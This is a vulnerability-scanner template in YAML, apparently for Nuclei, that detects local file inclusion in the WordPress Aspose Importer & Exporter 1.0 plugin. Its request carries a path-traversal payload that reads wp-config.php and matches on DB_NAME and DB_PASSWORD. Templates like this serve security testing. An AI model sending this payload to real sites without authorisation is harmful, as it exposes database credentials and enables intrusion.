id: aspose-ie-file-download

info:
  name: WordPress Aspose Importer & Exporter 1.0 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: WordPress Aspose Importer & Exporter version 1.0 is vulnerable to local file inclusion.
  reference:
    - https://packetstormsecurity.com/files/131162/
    - https://wordpress.org/plugins/aspose-importer-exporter
  tags: wordpress,wp-plugin,lfi,aspose

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        part: body
        condition: and

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/08/01
